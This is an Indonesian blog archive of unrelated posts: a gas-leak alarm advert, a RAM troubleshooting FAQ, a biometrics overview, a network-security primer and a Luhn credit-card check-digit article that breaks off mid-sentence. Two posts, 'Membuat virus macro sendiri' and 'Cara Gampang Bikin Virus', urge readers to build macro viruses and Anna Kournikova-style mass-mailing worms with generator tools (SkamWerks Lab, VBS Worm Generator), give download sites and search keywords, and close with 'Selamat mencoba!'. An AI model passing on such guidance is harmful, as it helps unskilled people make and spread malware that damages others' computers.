Selasa, 28 September 2010

AWAS LEDAKAN GAS LPG

Awas ledakan gas lpg mengintai anda jangan sampai anda menjadi korban berikutnya, sayangi diri anda keluarga dan aset berharga anda dari bahaya ledakan gas lpg yang sering terjadi akhir-akhir ini yang banyak memakan korban harta benda bahkan nyawa. Tunggu apalagi sebelum terlambat gunakan" ALARAM DETEKSI GAS LPG" adalah solusi tepat dan aman untuk melindungi anda dan keluarga anda serta aset berharga anda dari bahaya kebakaran akibat ledakan gas lpg, menurut hasil survey 29 juta tabung lpg 3 kg tidak layak pakai ( sumber TV One 22/6/2010 ), penyebab kebakaran di indonesia didominasi akibat ledakan gas lpg ( sumber jawa pos 31/12/2009 ). Jadi tunggu apalagi sebelum terlambat pesan segera ALARAM DETEKSI GAS LPG sekarang juga dengan harga Rp. 250.000,- sudah termasuk ongkos kirim untuk wilayah jabodetabek.
Untuk Pemesanan segera hubungi :

JULIANTORO / UPIK MARIANI.
NO TELP: 021-70661797, 7223208.
NO HP: 081210950295, 089650598280.

Pembayaran via transfer ke :
BRI Cab. Parung Panjang
No Rek: 0802-01-023576-53-3 atas nama : JULIANTORO.

ALAMAT KAMI : GRIYA PARUNG PANJANG BLOK C1/ G10 RT002/06
KABASIRAN PARUNG PANJANG BOGOR.
Apabila anda sudah melakukan transfer uang, harap sms ke no HP diatas dengan format :#alaram#nama jelas#alamat lengkap#bukti transfer#jumlah transfer#tgl transfer#jumlah pesanan#.

Barang akan kami kirim setelah anda melakukan transfer uang.


TUNGGU APALAGI JANGAN ANDA MENUNDA LAGI SEBELUM ANDA MENJADI KORBAN BERIKUTNYA.

COBA BANDINGKAN UANG RP 250.000 DENGAN JIWA ANDA KELUARGA ANDA SERTA ASET BERHARGA ANDA, SUNGGUH ANDA PASTI MENYESAL BILA MUSIBAH LEDAKAN LPG TERJADI PADA ANDA.

ANDA AKAN MERASA MAHAL DENGAN HARGA RP. 250.000 BILA MUSIBAH LEDAKAN GAS BELUM MENIMPA ANDA, DAN ANDA AKAN MERASA MENYESAL TIDAK MEMBELI ALARAM GAS LPG BILA MUSIBAH LEDAKAN GAS MENIMPA ANDA KELUARGA DAN ASET BERHARGA ANDA.

SEBELUM TERLAMBAT MILIKILAH ALARAM GAS LPG SEKARANG JUGA, JANGAN RAGU DAN TERLALU BANYAK BERFIKIR UNTUK MENGELUARKAN UANG RP. 250.000 YANG ANDA GUNAKAN UNTUK MELINDUNGI KELUARGA DAN ASET BERHARGA ANDA DARI BAHAYA LEDAKAN GAS LPG YANG MENGAKIBATKAN KEBAKARAN.

ALARM ELPIJI

Spesifikasi Tambahan:

•Tegangan 220V AC

•Ambang batas gas ELPIJI : 10% (+/-5%) LEL

•Suhu kerja : -10 s/d 50 derajat celcius

•Kelembaban kerja : <95%RH

•Bisa mendeteksi ELPIJI, Gas Negara, dan Gas Alam

Cara Pengoperasian:

1.Hubungkan alarm dengan listrik 220V
2.LED Indikator warna hijau akan berkedip selama 2-3 menit, sebelum alarm aktif
3.Jika LED Indikator warna hijau akan menyala itu menunjukkan bahwa alarm telah aktif.
4.Saat terdeteksi kebocoran gas, LED Indikator warna merah akan berkedip & alarm akan berbunyi “beep….beep”.
5.Alarm akan berhenti berbunyi dan kembali bekerja normal setelah konsentrasi gas elpiji berada dibawah ambang batas.
6.Jika alarm berbunyi panjang dan LED Indikator warna merah menyala, itu menandakan bahwa alarm tidak berkerja, cabut alarm dari listrik 220V dan coba hubungkan dengan listrik kembali.

Cara Pemasangan :
Catatan : Sebagai informasi, gas elpiji adalah gas yang lebih berat dari udara
1.Pilih posisi instalasi yang tepat yaitu tinggi 0.3m - 1m dari lantai & radius dari sumber gas < 1.5 m
2.Gantungkan alarm ke dinding dengan paku
3.Hindari instalasi yang terlalu dekat dengan ventilasi, kipas angin, pintu, jendela, sumber uap, minyak, dll

Tindakan Darurat:

Alarm akan berbunyi jika intensitas gas elpiji yang terdeteksi melebihi ambang batas, Berikut adalah langkah-langkah yang harus dilakukan:

1.Matikan katup regulator pada tabung elpiji.
2.Buka jendela dan biarkan udara masuk.
3.Matikan sumber-sumber api.
4.Hindari pemakaian alat-alat listrik termasuk menyalakan lampu
5.Cek kebocoran gas dan hubungi petugas yang berpengalaman.



Pemakaian tabung gas telah meluas di kalangan masyarakat kita. Tetapi seperti yang kita ketahui, ada bahaya mengancam yang mengintai saudara yang tidak waspada!!!

Sebagai bukti lihat deretan berita-berita ini:

1. Saat ini penyebab kebakaran yang terjadi DIDOMINASI karena MELEDAKNYA GAS ELPIJI (JAWA POS 31 Des 2009 Hal. 30)
2. Korban tewas ledakan tabung gas mencapai 21 orang.MetroNews
3. Tabung Elpiji 12 kg meledak, 1 orang mengalami luka bakar serius di tubuhnya. MetroNews
4. Ledakan tabung gas di Tangerang. Kompas.com
5. Tabung gas artis pun juga kena. Okezone
6. Ratusan tabung gas ditemukan bocor Liputan 6
7. Selang gas penyebab gas bocor Kompas.com
8. Berbagai daerah meragukan dan waspada terhadap penggunaan tabung gas Kompas.com
9. Saat sahur, warga kebun jeruk Jakarta terkena ledakan gas Kompas.com
10. Balita menjadi korban ledakan gas Kompas.com
11. Ditemukan 25.994 Tabung Gas Elpiji Rusak di Jombang Tempo Interaktif


Kebocoran Gas ELPIJI dapat disebabkan oleh :

1. Kualitas Tabung Gas, Regulator, Selang & Komport Gas yang buruk
2. Pemasangan / Instalasi yang KURANG TEPAT
3. Selang digigit tikus dan aus karena faktor usia

Segera lindungi diri anda, keluarga, dan aset berharga anda dengan ALARM KEBOCORAN GAS ELPIJI
ALARM ini memberikan perlindungan selama 24 JAM penuh sehingga sangat cocok digunakan baik untuk di dapur maupun di kamar mandi pada rumah tangga, hotel, restaurant, vila, usaha katering dan lainnya.

VIDEO ALARAM GAS LPG :
http://www.youtube.com/watch?v=9Jnub2DdwcM&feature=player_embedded

Rabu, 23 Juni 2010

Mengatasi masalah pada RAM

Q : Mengapa Windows mendeteksi RAM yang lebih sedikit dari yang sesungguhnya ?
A : Ada banyak hal yang menyebabkan, diantaranya adalah :

1. "Kerusakan" fisik". Untuk mengatasinya Anda harus memeriksa kondisi fisik RAM tersebut. Buka casing komputer Anda, lalu cabut RAM tersebut. Bersihkan apabila RAM dan socketnya kotor. Periksa juga apakah ada karat. Anda juga harus memastikan bahwa RAM tersebut dari bahan yang sama (keemasan atau keperakan). Jika berbeda, sebaiknya Anda mengganti RAM tersebut.
2. ROM Shadowing Pada beberapa BIOS dan driver 16 bit, kadang-kadang memakai sebagian (baca : sedikit) RAM sebelum Windows dijalankan. Beberapa BIOS juga terdapat feature ROM shadowing yang akan mengcopy isi dari system dan video BIOS ROM ke RAM guna meningkatkan performa komputer (Pada DOS dan Windows 3.1 ). Hal ini karena kecepatan ROM lebih rendah dari RAM. Tetapi jika Anda memakai Windows 95/98/NT dengan memori yang minim sebaiknya feature ROM shadowing dimatikan saja (dari CMOS setup), karena Windows 95/98/NT jarang sekali mengakses ROM sehingga RAM tersebut dapat digunakan oleh Windows.
3. Penggunaan VGA card on board. Jika misalnya Anda memiliki RAM 32 Mb dan VGA card 2 Mb, maka RAM yang dapat digunakan hanya sebesar 30 Mb (32 Mb - 2 Mb). Jadi sebaiknya jangan memakai VGA card on board.
4. Terdapat driver atau program yang dijalankan dari config.sys atau autoexec.bat yang bekerja menggunakan RAM. Solusinya : Edit file autoexec.bat dan config.sys dengan menggunakan Notepad. Lalu editlah pada baris yang "mencurigakan" atau yang kira-kira digunakan untuk me-load program. Bila ketemu tambahkan kata REM (tetapi bila Anda menambahkan kata REM maka program tersebut tidak akan di-load/dijalankan). Bila Anda memakai driver CD-ROM 4x dari Teac, ubahlah parameter xmssize= -1 pada autoexec.bat menjadi xmssize=0.
5. Virtual device driver dijalankan dari system.ini. Untuk mengatasinya buka system ini dengan cara klik Start - Run - ketikkan sysedit. Pilih system.ini. Lalu editlah pada baris yang kira-kira digunakan untuk meload virtual device driver. Alternatif lainnya adalah dengan membuat file system.ini yang baru.
6. Terdapat baris Maxphyspage pada file system.ini Silakan lihat pada file system.ini, apakah terdapat baris Maxphyspage atau tidak. Jika ya, hapus baris tersebut.
7. Kesalahan pada CMOS setting. Pada beberapa komputer terdapat feature Memory Hole at 16 Mb atau Hold to 15 Mb RAM. Jika feature tersebut di enable maka jika Anda memiliki RAM yang lebih besar dari 15 Mb atau 16 Mb, Windows tetap akan mendeteksi sebesar 15 Mb atau 16 Mb. Untuk mengatasi hal ini, silakan di disable feature tersebut.
8. Meload Ramdrive.sys dari config.sys Check your Config.sys file for a line containing "Ramdrive.sys." If you have this line, it means you are using a RAM drive. To disable the RAM drive, remove or disable the line in the Config.sys file that contains "ramdrive.sys." To disable the line, use a text editor (such as Notepad) to edit the Config.sys file and place a semicolon (;) at the beginning of the line. Buka file config.sys dengan Notepad. Cek pada file tersebut, apakah terdapat baris ramdrive.sys. Jika ya, hapus baris tersebut

Q : Setelah menambah RAM, mengapa RAM yang terdeteksi masih sama ?
A : Setelah Anda menginstall RAM, Anda harus melakukan Setup BIOS ulang. Caranya, pada saat pertama kali menghidupkan komputer sampai muncul logo BIOS, tekan Del (untuk beberapa komputer mungkin Ctrl+Alt+Del atau kombinasi key yang lain). Setelah selesai, pilih Save Setting and Exit. Sebagai tambahan informasi untuk setting tersebut, Anda bisa membaca pada manul booknya.

Q : Mengapa terjadi error setelah saya menginstall RAM baru ?
A : Anda bisa melihat pada manual booknya. Untuk beberapa BIOS : Jika Anda menginstall (misalnya) 2-4 Mb SIMMS dan 2-8 Mb SIMMS, Anda harus meletakkan RAM yang lebih besar pada Bank 1.

Q : Setelah saya menginstall RAM baru, mengapa sering terjadi Blue Screen ?
A : Pada komputer yang menggunakan bus 66 MHz (Pentium 133 atau yang lebih tinggi), dibutuhkan RAM dengan kecepatan 60 ns atau yang lebih tinggi. Anda bisa saja menggunakan RAM dengan kecepatan yang lebih kecil dari 60 ns tapi Anda harus mengubah setting Wait State pada BIOS. Ubahlah setting tersebut dari 0 (nol) menjadi 1 (satu).

Q :Mengapa muncul tulisan Parity Check Error ?
A : Tulisan parity check error dapat muncul jika terdapat kerusakan pada salah satu RAM, salah satu proses DMA tidak berjalan dengan lancar, atau karena terdapat virus parity boot pada hard disk Anda.

Membuat virus macro sendiri

Berdasarkan sifat dan penyerangannya, virus komputer dapat dibedakan menjadi beberapa macam, misalnya virus boot sector, virus file, polymorphic virus, stealth virus, dan virus makro. Virus makro ini dapat menyerang pada dokumen MS Word, Excel atau Power Point. Virus makro ini termasuk virus yang paling banyak dijumpai di sekitar kita. Tentunya kita masih ingat dengan adanya virus Mellisa atau virus I Love You yang juga dapat kita masukkan ke dalam kategori virus macro.

Mengapa virus makro ini sering sekali kita jumpai? Jawabnya tentu saja karena populasi pengguna MS Office sangat banyak. Dengan pengguna yang cukup banyak tentunya virus makro dapat berkembang dengan cepat. Dengan melakukan pertukaran data *.doc (dokumen MS Word) yang telah terinfeksi maka sudah cukup untuk membuat semua dokumen menjadi terinfeksi.

Yang menarik, bagaimana cara membuat virus makro tersebut? Kalau Anda seorang programmer, dengan bantuan berbagai referensi tentunya mudah saja untuk belajar membuat virus makro. Masalahnya bagaimana kalau kita sama sekali tidak menguasai bahasa pemrograman?

Tenang saja, di internet banyak sekali software yang dapat digunakan untuk membuat virus makro. Salah satunya adalah SkamWerks Lab. Dengan fasilitas Virii Wizard, kita dapat membuat virus mulai dari awal sampai selesai. Saat menggunakan Virii Wizard, kita dapat menuliskan pembuat virusnya, nama virus, dan makro-makro yang akan dimasukkan ke dalam virus. Nah, daripada penasaran, silakan Anda cepat-cepat mencobanya sendiri. Tentunya setelah Anda mendownload programnya di sini.

Jika berminat, Anda bisa mendapatkan software-software lain yang dapat digunakan untuk membuat virus di sini. Koleksinya sangat lengkap!

Selamat mencoba!

Biometric, Badan Anda Adalah Password

Dalam dunia perdagangan seperti e-commerce, kepercayaan (trust) merupakan kunci utama terjadinya transaksi. Secara konvensional umumnya kita menggunakan berbagai teknik password & security yang di bangkitkan melalui data yang masukan ke komputer. Data tersebut umumnya di masukan secara manual menggunakan tangan.

Beberapa konsep telah dikembangkan untuk menjamin kepercayaan (trust) tersebut. Contoh yang sering kita kenal, ada konsep Certificate Authority(CA) yang merupakan badan autoritas yang melakukan registrasi identitas dari semua pelaku transaksi yang bisa di pertanggung jawabkan indentitasnya. Pengamanan Certificate Authority dilakukan dengan mekanisme penyandian / enkripsi yang bertumpu pada Public Key Infrastructure (PKI) yang menggunakan pasangan kunci (kunci public & kunci private) untuk menyandikan informasi yang akan dikirim.

Sialnya konsep CA & PKI ini, kita mengandalkan informasi identitas yang dimasukan secara manual kedalam sistem. Umumnya, tidak ada keterkaitan antara data di CA & PKI dengan data fisik (badan) dari pelaku transaksi. Hal ini agak menyulitkan karena seluruh proses akan sangat tergantung kepada keahlian si pelaku dalam menyimpan password / kunci private yang biasa digunakan dalam proses transaksi. Untuk mengatasi hal ini maka mulai berkembang pemikiran-pemikiran untuk menggunakan anggota badan sebagai komponen "password" untuk authentikasi dalam menjamin kepercayaan (trust). Hal ini tampak nyata sekali dalam pameran COMDEX di Las Vegas akhir tahun 2000 yang lalu dimana penulis berkesempatan untuk hadir atas sponsor dari rekan-rekan di Asosiasi Pengusaha Komputer Indonesia (APKOMINDO).

Biometric merupakan teknik authentikasi yang mengambil karakteristik fisik seseorang. Ada beberapa teknik yang sering digunakan dalam authentikasi biometric. Beberapa diantara-nya adalah:

Biometric merupakan teknik authentikasi yang mengambil karakteristik fisik seseorang. Ada beberapa teknik yang sering digunakan dalam authentikasi biometric. Beberapa diantara-nya adalah:

* Pengenalan sidik jari, barangkali termasuk yang paling cost effective akan tetapi tetap mempertahankan tingkat keamanan yang tinggi dan kemudahan untuk penggunaan. Beberapa peralatan yang di pamerkan juga memperlihatkan sensor sidik jari yang terpasang pada mouse, pintu dll.
* Pengenalan sidik jari dapat dikembangkan lebih lanjut untuk pengenalan telapak tangan. Seperti yang sering kita lihat dalam film-film detektif / action luar negeri.
* Pengenalan Suara (Voice Scan) merupakan teknik lain yang merupakan bagian dari voice recognition. Tentunya teknik ini harus di perhalus untuk keperluan authentikasi, untuk keperluan non-authentikasi sudah di kenal dalam dunia telekomunikasi untuk automatisasi layanan pelanggan berdasarkan perintah suara.
* Pengenalan muka (facial scan) merupakan teknik authentikasi lainnya yang akan mengenal muka seseorang dari hasil pengindraan kamera digital.
* Signature Verification (verifikasi tanda tangan) dapat juga dilakukan secara otomatis menggunakan teknik pengenalan citra digital.
* Iris Scan & Retina Scan, melakukan verifikasi dari retina mata - menurut sebagian peneliti tampaknya scan retina ini merupakan teknik yang termasuk paling ampuh untuk melakukan authentikasi di bandingkan sidik jari.
* Keystroke Dynamik - merupakan teknik authentikasi yang paling unik karena teknik ini melihat cara kita mentik password di atas keyboard. Kebetulan saya sempat melihat sendiri dari dekat di COMDEX 2000 Las Vegas, jadi sistem akan belajar terlebih dulu dari sekitar 20-30 keystroke password yang kita masukan, jadi walaupun password kita di curi orang, si pencuri tidak akan bisa membobol sistem kita karena cara masing-masing orang dalam men-tik di papan keytboard akan selalu berbeda satu dengan lainnya. Perbedaan ini yang di deteksi oleh keystroke dynamic ini.

Umumnya para vendor juga telah mengembangkan teknik-teknik proteksi supaya sensor untuk scan berbagai bagian tubuh ini tidak tertipu mentah-mentah oleh maling / pencuri. Contohnya untuk scan sidik jari, sensor di lengkapi fasilitas pendeteksi pantulan kulit yang benar agar tidak tertipu jika pembobol menggunakan sarung tangan dengan sidik jari pengguna.

Untuk informasi lebih lanjut tentang biometric ini dapat dibaca di beberapa situs besar di Internet seperti:

* http://dobi.com/a_bio1/vendor/vendor_index3.htm - berisi daftar vendor Biometric.
* http://homepage.ntlworld.com/avanti/ - berisi buku / referensi cara kerja Biometric.
* http://www.ibia.org/ - International Biometric Industry Association.
* http://www.biometric.org - Biometric Consortium.

Cara Gampang Bikin Virus

Kamu pasti masih inget dengan virus worm yang sempat menghebohkan Tampilan awal program Vbs WGinternet beberapa waktu yang lalu : Anna Kournikova. Worm yang menginfeksi Windows beserta Outlook Exressnya, akan mengirim sendiri pesan virus ke seluruh email yang terdapat pada address book.

Sebenarnya untuk membuat worm semacam itu kamu tidak harus menjadi seorang programmer handal. Cukup bisa njalanin komputer dan punya softwarenya. Lalu apa softwarenya ? VBS Worm Generator !! Dengan program yang dibuat oleh hacker Argentina berusia 18 tahun itu kamu dapat membuat virus yang sama dahsyatnya dengan Anna Kournikova, cukup dengan melakukan beberapa klik.

Program VBSWG memungkinkan kamu untuk membuat worm dengan nama sesukamu. Kamu juga bisa memilih efek dari worm tersebut, seperti misalnya menampilkan pesan atau memaksa seseorang untuk menuju situs tertentu. Akibat yang paling parah tentunya jika worm tersebut kamu setting supaya membikin crash komputer.

Kemampuan lain dari VBSWG adalah melakukan enkripsi terhadap source code worm yang dibuat. Kemampuan lainnya bisa kamu coba sendiri :-) Pokoknya cukup hebatlah program ini.

Tapi seperti yang dikatakan oleh pembuatnya, VBS Worm Generator hanya boleh digunakan untuk belajar, bukan untuk merugikan orang lain. Untuk itu jika Anda memang berniat mencobanya, ingat-ingat peringatan tersebut.

Situs yg menyediakan VBSWG :

http://www.virii.com.ar,
http://www.kvirii.com.ar,
http://vx.netlux.org/dat/tv07.shtml.

Atau gunakan search engine http://www.google.com dan masukkan keyword vbswg2bfix.zip, Vbswg2B.zip, worm generator, dan keyword semacamnya

Network security : apa dan bagaimana

Seperti yang kita lihat di saat ini, Internet telah tumbuh dan berkembang hingga mencapai angka beberapa juta unit komputer yang terkoneksi di berbagai belahan dunia. Dari hari ke hari pula informasi yang terkandung di dalam jaringan Internet tersebut semakin lengkap, akurat, dan penting. . Informasi telah menjadi suatu asset yang sedemikian berharga sehingga perlu mendapat perlakuan yang lebih spesifik. Selain itu pula, kemajuan yang dicapai dalam bidang pengembangan sistem operasi komputer sendiri dan utulitasnya sudah sedemikian jauh dimana tingkat performansi, keandalan dan fleksibilitas software menjadi kriteria utama dalam proses pengembangan software. Dengan semakin penting dan berharganya informasi tersebut dan ditunjang oleh kemajuan pengembangan software, tentunya menarik minat para pembobol (hacker) dan penyusup (intruder) untuk terus bereksperimen guna menemukan dan mempergunakan setiap kelemahan yang ada dari konfigurasi sistem informasi yang telah ditetapkan

Bertolak dari kenyataan di atas, muncul sebuah konsep yang lebih sering disebut dengan Network Security. Pada awalnya, konsep ini menjelaskan lebih banyak mengenai keterjaminan (security) dari sebuah sistem jaringan komputer yang terhubung ke Internet terhadap ancaman dan gangguan yang ditujukan kepada sistem tersebut. Cakupan konsep tersebut semakin hari semakin luas sehingga pada saat ini tidak hanya membicarakan masalah keterjaminan jaringan komputer saja, tetapi lebih mengarah kepada masalah-masalah keterjaminan sistem jaringan informasi secara global. Beberapa negara Eropa dan Amerika bahkan telah menjadikan Network Security menjadi salah satu titik sentral perhatian pihak-pihak militer masing-masing.

Sebenarnya, masalah Network Security ini timbul dari konektivitas jaringan komputer lokal yang kita miliki dengan wide-area network (seperti Internet). Jadi, selama jaringan lokal komputer kita tidak terhubung kepada wide-area network, masalah Network Security tidak begitu penting. Tetapi hal ini bukan berarti memberikan arti bahwa bergabung dengan wide-area network adalah suatu hal yang 'menakutkan' dan penuh bahaya. Network Security hanyalah menjelaskan kemungkinan-kemungkinan yang akan timbul dari konektivitas jaringan komputer lokal kita dengan wide-area network.

Secara umum, terdapat 3 (tiga) kata kunci dalam konsep Network Security ini, yaitu:

* resiko / tingkat bahaya,
* ancaman, dan
* kerapuhan sistem (vulnerability)

Resiko atau tingkat bahaya
Dalam hal ini, resiko berarti berapa besar kemungkinan keberhasilan para penyusup dalam rangka memperoleh akses ke dalam jaringan komputer lokal yang dimiliki melalui konektivitas jaringan lokal ke wide-area network. Secara umum, akses-akses yang diinginkan adalah :

* Read Access : Mampu mengetahui keseluruhan sistem jaringan informasi.
* Write Access : Mampu melakukan proses menulis ataupun menghancurkan data yang terdapat di sistem tersebut.
* Denial of Service : Menutup penggunaan utilitas-utilitas jaringan normal dengan cara menghabiskan jatah CPU, bandwidth maupun memory.

Ancaman
Dalam hal ini, ancaman berarti orang yang berusaha memperoleh akses-akses illegal terhadap jaringan komputer yang dimiliki seolah-olah ia memiliki otoritas terhadap akses ke jaringan komputer.

Kerapuhan System (Vulnerability)
Kerapuhan sistem lebih memiliki arti seberapa jauh proteksi yang bisa diterapkan kepada network yang dimiliki dari seseorang dari luar sistem yang berusaha memperoleh akses illegal terhadap jaringan komputer tersebut dan kemungkinan orang-orang dari dalam sistem memberikan akses kepada dunia luar yang bersifat merusak sistem jaringan.

Untuk menganalisa sebuah sistem jaringan informasi global secara keseluruhan tentang tingkat keandalan dan keamanannya bukanlah suatu hal yang mudah dilaksanakan. Analisa terhadap sebuah sistem jaringan informasi tersebut haruslah mendetil mulai dari tingkat kebijaksanaan hingga tingkat aplikasi praktisnya.

Sebagai permulaan, ada baiknya kita melihat sebuah sistem jaringan yang telah menjadi titik sasaran utama dari usaha-usaha percobaan pembobolan tersebut. Pada umumnya, jaringan komputer di dunia menggunakan sistem operasi Unix sebagai platform. Unix telah menjadi sebuah sistem operasi yang memiliki keandalan tinggi dan tingkat performansi yang baik. Tetapi, pada dasarnya Unix tersusun oleh fungsi-fungsi yang cukup rumit dan kompleks. Akibatnya, Unix juga memiliki beberapa kelemahan seperti bug-bug (ketidaksesuaian algoritma pemrograman) kecil yang kadang kala tidak disadari oleh para pemrogram Unix. Selain itu, utilitas-utilitas yang memanfaatkan Unix sebagai platformnya, seringkali mempunyai bug-bug tersendiri pula. Nah, hal-hal inilah yang sering dieksploitasi oleh para hacker dan intruder di seluruh dunia.

Guna mencegah berhasilnya eksploitasi para hacker dan intruder tersebut, dikembangkan sebuah konsep yang dikenal dengan UNIX Network Security Architecture. Arsitektur ini mencakup 7 lapis tingkat sekuriti pada jaringan. Ketujuh lapis tersebut adalah sebagai berikut :

* Lapis ke-7 : Kebijaksanaan
* Lapis ke-6 : Personil
* Lapis ke-5 : Local Area Network
* Lapis ke-4 : Batas Dalam Jaringan
* Lapis ke-3 : Gateway
* Lapis ke-2 : Paket Filtering
* Lapis ke-1 : Batas Luar Jaringan

Kebijaksanaan
Lapis kebijaksanaan menjadi pelindung terhadap keseluruhan program proteksi dan sekuriti jaringan yang diterapkan. Lapis ini mempunyai fungsi mendefinisikan kebijakan-kebijakan organisasi mulai dari resiko yang paling besar yang mungkin didapat hingga bagaimana mengimplementasikan kebijaksanaan yang diambil terhadap prosedur-prosedur dasar dan peralatan yang digunakan. Lapis ini menjadi salah satu penentu utama keberhasilan program proteksi dan sekuriti sistem.

Personil
Lapis ini mendefinisikan segi manusia dalam sistem jaringan informasi. Personil yang melakukan instalasi, konfigurasi, pengoperasian hingga orang-orang yang mampu menjalankan akses-akses yang tersedia di sistem adalah termasuk dalam lapis ini. Kebijakan yang diambil pada lapis ini pada dasarnya harus mencerminkan tujuan-tujuan yang ingin dicapai dalam program proteksi dan sekuriti ini.

Local Area Network
Lapis selanjutnya mendefinisikan peralatan-peralatan dan data-data yang harus mendapatkan proteksi. Selain itu, lapis ini juga mencakup prosedur-prosedur pengawasan dan kontrol yang sering diterapkan dalam sistem.

Batas Dalam Jaringan Batas
Dalam Jaringan mendefinisikan lapisan sistem yang terkoneksi secara fisik ke daerah "penyangga" yang menjadi pemisah antara sistem jaringan informasi lokal dengan jaringan luar. Batas ini menjadi penting karena titik ini menjadi sasaran utama usaha-usaha eksploitasi untuk memperoleh akses illegal. Ada baiknya daerah penyangga ini dikonsentrasikan pada satu titik sehingga penerapan prosedur pengawasan dan kontrol menjadi lebih mudah. Demikian pula bila datang serangan dari luar sistem, hanya akan terdapat satu titik masuk yang paling utama. Dengan demikian, akan lebih mudah mengisolasi sistem yang dimiliki dari konektivitas ke luar bila terjadi gangguan.

Gateway
Gateway mendefinisikan menjadi pintu utama dari dan ke sistem yang dimiliki. Kebijaksanaan proteksi dan sekuriti sebuah sistem yang terkoneksi dengan wide-area network seharusnya lebih mengarahkan usaha-usaha yang ada untuk mengamankan lapis ini sebaik mungkin. Servis-servis publik ada baiknya diletakkan pada lapis tersebut guna meminimisasi kemungkinan akses yang lebih jauh ke dalam sistem.

Paket Filtering
Lapis ini mendefinisikan platform yang berada di antara network interface lapis 3 (gateway) dengan network interface yang menjadi tempat penerapan metoda Firewall. Lapis tersebut lebih bersifat sebagai program yang menjalankan fungsi pengawasan (monitoring) terhadap paket-paket data yang masuk maupun yang keluar sistem.

Batas Luar Jaringan
Batas Luar Jaringan mendefinisikan titik dimana sistem terhubung dengan wide-area network dan kita tidak memiliki kontrol langsung terhadap titik tersebut.

Seperti yang telah dijabarkan di atas, lapis ke-3 menjadi titik utama dan yang paling rawan dalam network security ini. Implementasi kebijaksanaan yang diambil pada layer ini hanya bisa dilakukan secara software. Terdapat beberapa jenis security software yang bisa digunakan untuk memperkuat usaha proteksi dan sekuriti sistem pada lapis ke-3 ini. Di antaranya adalah :

TCP Wrapper
Program ini menyediakan layanan monitoring dan kontrol terhadap network services. Pada dasarnya, yang dilakukan oleh program ini adalah membuat daftar log mengenai aktivitas-aktivitas hubungan yang terjadi. Program ini dapat diambil secara gratis melalui anonymous FTP via ftp.cert.org yang terletak pada direktori pub/tools/tcp_wrappers/tcp_wrappers.*

Swatch
Program Swatch menggabungkan daftar-daftar log yang telah diciptakan oleh program-program utilitas lain di samping kelebihannya yang mampu dikonfigurasi sehingga pada saat melakukan logging, Swatch bisa melakukan aksi lain berdasar pada prioritas-prioritas tertentu. Swatch tersedia melalui anonymous FTP dari sierra.stanford.edu pada direktori pub/sources.

SOCKS library dan sockd
Program ini menjadi alternatif lain dari implementasi konsep "TCP Wrapper". Kegunaan utama program ini adalah mengkonsentrasikan semua layanan umum internet pada suatu titik. "sockd" dijalankan oleh "inetd" pada saat permintaan layanan tertentu muncul dan hanya memperbolehkan koneksi dari host-host yang telah terdaftar. Program ini tentu saja juga melakukan aktivitas log yang berkaitan dengan koneksi yang terjadi. Program ini dapat diperoleh melalui anonymous FTP pada host s1.gov pada direktori /pub dengan nama socks.tar.Z.

Algoritma Cek Digit Pada Kartu Kredit

Di dunia nyata tentunya Anda sudah mengetahui, atau setidaknya mendengar bagaimana kartu kredit telah diterima secara luas di masyarakat. Berbagai toko, dan penyedia layanan jasa telah menerima pembayaran dengan menggunakan kartu kredit. Saat ini di dunia maya (Internet), pembayaran dengan kartu kredit juga sudah mulai diterima secara luas. Berbagai kejahatan telah sering dilakukan dengan penggunaan kartu kredit ini, baik di dunia nyata maupun di dunia maya. Namun di artikel ini saya tidak akan membahas mengenai keamanan kartu kredit, saya hanya membahas suatu hal kecil yang disebut sebagai pengecekan digit pada kartu kredit. Hal ini memang cukup kecil, namun patut diketahui oleh semua orang.

Dalam proses pembayaran di Internet dengan menggunakan kartu kredit, ada suatu proses yang sangat diperlukan yaitu authentication, hal ini merupakan proses untuk membuktikan bahwa nomor kartu kredit yang dimasukkan adalah benar, dan yang memasukkan adalah orang yang berhak untuk menggunakan kartu itu. Hal ini tampaknya mudah dilakukan, sebuah program bisa langsung dihubungkan ke server bank dan bisa langsung diperiksa, tapi hal ini tentunya cukup menyita waktu, bagaimana jika nomor kartu yang dimasukkan ternyata salah ketik?, segala koneksi ke server bank, segala pencarian data dan lain-lainnya tentunya akan sia-sia.

Untuk (sedikit) memecahkan masalah di atas, nomor kartu kredit telah dirancang sedemikian rupa sehingga memungkinkan dilakukannya pengecekan awal sebelum sebuah nomor diperiksa melalui bank yang bersangkutan. Pengecekan ini adalah pengecekan kombinasi digit yang lazim dikenal dengan nama algoritma cek digit. Algoritma cek digit yang dipakai di kartu kredit adalah algoritma cek digit Luhn (Luhn check digit algorithm).

Algoritma Cek Digit Luhn
Algoritma cek digit merupakan suatu algoritma yang digunakan untuk mengecek validitas suatu angka berdasarkan digit-digit yang membentuknya. Salah satu aplikasi sangat umum yang kita temui dalam kehidupan sehari-hari adalah proses pemasukan data barang belanjaan yang kita beli di supermarket yang kecil (yang masih menggunakan input manual, tidak menggunakan bar code reader). Mungkin kadang-kadang Anda melihat kasir kadang-kadang salah memasukan data sehingga muncul sedikit pesan kesalahan dan kemudian dia mengetik ulang kembali kode barang yang tercantum di barang. Pernahkah Anda berpikir bagaimana komputer bisa tahu bahwa nomor tersebut salah?. Jawabnya adalah dengan menggunakan cek digit, biasanya digit terakhir dari kode barang itu merupakan hasil operasi matematis terhadap digit-digit sebelumnya, sehingga jika ada kesalahan input langsung terdeteksi, misalnya kode barang adalah 98876768532 tetapi yang dimasukkan adalah 98876768533 komputer akan menganggap data ini salah. Andaikan cek digit ini tidak ada, dan setiap kode barang dibuat urut, komputer akan menganggap benar semua data yang dimasukkan, mungkin akan tercantum Anda membeli sebatang coklat Silver Queen padahal yang Anda beli adalah coklat merek lain.

Untuk algoritma cek digit Luhn, sebenarnya saya kurang mengerti sejarah cek digit dengan algoritma ini, tapi algoritma ini dipakai oleh semua bank besar yang mengeluarkan kartu kredit (Visa, MasterCard, Amex, Novus, dan mungkin masih banyak yang lain). Algoritma cek digit ini juga dipakai di kartu-kartu ATM, setidaknya yang sudah saya perhatikan kartu ATM Bank BNI dan BII sepertinya bank yang lain juga menggunakan cara ini. Ketika pihak Telkom memperkenalkan TeCC (Telkom Calling Card), algoritma ini juga dipakai.

Metode cek digit ini sebenarnya sederhana, hanya perlu tiga langkah untuk membuktikan apakah suatu kartu memenuhi algoritma cek digit Luhn, untuk kartu dengan jumlah digit genap (mis Visa [16 digit], MasterCard[16 digit], dan Novus[16 digit]) caranya sebagai berikut :

